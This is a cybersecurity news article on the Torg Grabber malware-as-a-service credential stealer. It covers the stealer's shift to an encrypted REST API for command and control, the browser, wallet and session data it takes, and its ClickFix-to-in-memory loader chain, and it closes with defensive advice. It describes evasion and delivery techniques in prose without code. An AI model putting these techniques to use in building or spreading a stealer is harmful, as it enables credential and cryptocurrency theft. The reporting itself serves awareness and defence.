Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Critical Microsoft Flaws Let Attackers Gain Privileges, Steal Data
July 2, 2026
FortiBleed Vulnerability Exploited by INC and Lynx Ransomware to Steal Passwords
July 2, 2026
WhatsApp Username Reservations Raise Security Concerns for 2 Billion Users
July 2, 2026
Home/Threats/Torg Grabber Stealer Shifts to Encrypted REST API for C2
Threats

Torg Grabber Stealer Shifts to Encrypted REST API for C2

Key Takeaways Torg Grabber, a credential stealer offered as Malware-as-a-Service (MaaS), has rapidly evolved its command-and-control (C2) infrastructure. The malware transitioned from simple...

Jennifer sherman
Jennifer sherman
March 26, 2026 4 Min Read
54 0

Key Takeaways

  • Torg Grabber, a credential stealer offered as Malware-as-a-Service (MaaS), has rapidly evolved its command-and-control (C2) infrastructure.
  • The malware transitioned from simple Telegram-based exfiltration to a highly sophisticated, encrypted REST API C2 system within three months.
  • Torg Grabber targets a wide array of sensitive data, including browser credentials, cryptocurrency wallets, 2FA tools, and session data from popular applications like Discord and Steam.
  • The stealer utilizes a multi-stage loader chain and in-memory execution to evade detection, often delivered via fake game cheats or cracked software.

Torg Grabber Stealer Adopts Encrypted REST API for Advanced C2 Operations

A new credential-stealing malware, identified as Torg Grabber, is rapidly escalating its capabilities as a Malware-as-a-Service (MaaS) offering. In a mere three months, this stealer has undergone significant development, migrating its data exfiltration mechanisms from basic Telegram channels to a sophisticated, encrypted REST API for command-and-control (C2) communications. This swift evolution underscores a growing trend of advanced techniques within the cybercrime landscape.

Table Of Content

  • Key Takeaways
  • Torg Grabber Stealer Adopts Encrypted REST API for Advanced C2 Operations
  • Discovery and Technical Analysis
  • The Loader Chain: From Dropper to In-Memory Execution
  • What You Should Do

Initially relying on straightforward Telegram-based data exfiltration, Torg Grabber quickly matured to leverage a fully encrypted REST API for its C2 infrastructure. The operational scale of this threat is evident, with 334 unique samples compiled during its brief observed lifespan and over 40 distinct operator tags discovered within its binaries. This robust activity indicates an organized, builder-based cybercrime operation catering to numerous malicious buyers.

The malware derives its name from one of its primary C2 domains, technologytorg.com, where “torg” is a Russian term signifying “trade” or “marketplace.” This nomenclature is particularly fitting given the malware’s purpose of acquiring and trading stolen credentials.

Discovery and Technical Analysis

The discovery of Torg Grabber began when a sample, initially misidentified as Vidar Stealer, arrived at a research lab. Forensic examination quickly revealed discrepancies: the binary was a 64-bit Portable Executable compiled with MinGW-GCC, contrasting sharply with Vidar’s 32-bit MSVC build. Further analysis uncovered an embedded debug string, “grabber v1.0,” and a C2 protocol utilizing REST API endpoints secured with ChaCha20 encryption and HMAC-SHA256 authentication—architectural elements entirely distinct from Vidar.

Gen Digital’s Threat Research Team was responsible for identifying and formally naming the malware after an in-depth dissection of its binary. Their analysts confirmed that Torg Grabber progressed through three distinct exfiltration phases within its short operational period.

  • Phase 1 (December 9-11, 2025): Early builds transmitted stolen ZIP archives to private Telegram channels via the Telegram Bot API, a method offering speed and requiring minimal infrastructure.
  • Phase 2 (December 17-20, 2025): The malware briefly shifted to a raw TCP socket protocol, employing a custom 9-byte binary frame secured with ChaCha20-Poly1305 encryption.
  • Phase 3 (Beginning December 18, 2025): Torg Grabber transitioned to a production-grade REST API over HTTPS, routed through Cloudflare. This advanced approach significantly complicates traffic interception and domain-based blocking efforts.

The malware’s data collection capabilities are extensive. It targets credentials from 25 Chromium-based browsers and 8 Firefox-family browsers, harvests data from over 850 browser extensions including cryptocurrency wallets and two-factor authentication (2FA) tools, and captures session data from applications like Discord, Telegram, and Steam. Additionally, it collects VPN configurations, FTP client data, and desktop screenshots. Prior to initiating data collection, Torg Grabber performs an evasion check, scanning for 46 antivirus signatures across 24 different security products to assess the victim’s defenses.

Investigations into the confirmed operator tags linked eight of them to active Telegram accounts associated with Russian-speaking cybercrime networks.

The Loader Chain: From Dropper to In-Memory Execution

Torg Grabber is not deployed as a standalone executable; instead, it is delivered via a sophisticated, multi-stage loader chain designed to evade detection. This chain progressively unpacks the stealer, ensuring it only executes in memory.

The initial stage, referred to as Stage 0, functions as the dropper. Victims typically encounter this through deceptive means such as fake game cheats, pirated software packages, or clipboard injection attacks (like ClickFix) hosted on Google Apps Script. A documented infection on January 30, 2026, involved a malicious webpage silently injecting a PowerShell command into the user’s clipboard, instructing them to paste and execute it. This action initiated a covert BITS Transfer download, which then executed through Windows’ legitimate svchost.exe process, effectively blending with normal system traffic and bypassing many endpoint security tools.

Stage 1 is a self-extracting loader containing an AES-256-CBC encrypted overlay appended beyond the binary’s standard section data. This stage decodes and decrypts its payload using custom hex decoding and AES decryption routines. It further enhances stealth by resolving Windows NT API calls at runtime through direct syscalls, thus presenting no visible imports for static analysis tools to flag.

Stage 2 operates entirely within memory as a reflective PE loader. This stage maps the final stealer payload directly into memory without writing any components to disk. By the time Stage 3 activates, the Torg Grabber stealer is running within a live process, leaving no persistent files for disk-based scanning or detection.

What You Should Do

  • Exercise Caution with Downloads: Avoid downloading software from untrusted sources, including unofficial game cheat sites, cracked application platforms, and suspicious links.
  • Monitor PowerShell Activity: IT security teams should implement monitoring for PowerShell commands containing base64-encoded arguments and unexpected BITS Transfer job creations.
  • Enhance Endpoint Detection: Configure endpoint security tools to flag direct syscall usage and patterns indicative of in-memory PE loading.
  • Secure Browser Data: For organizations using Chromium-based browsers, ensure App-Bound Encryption is properly configured. Treat any unexplained browser process suspensions during normal activity as a potential indicator of compromise.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwareSecurityThreat

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

Fake Screenshots Infect Web3 Support Staff with Multi-Stage Malware

Next Post

GhostClaw AI Malware Targets macOS Users, Steals Credentials

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us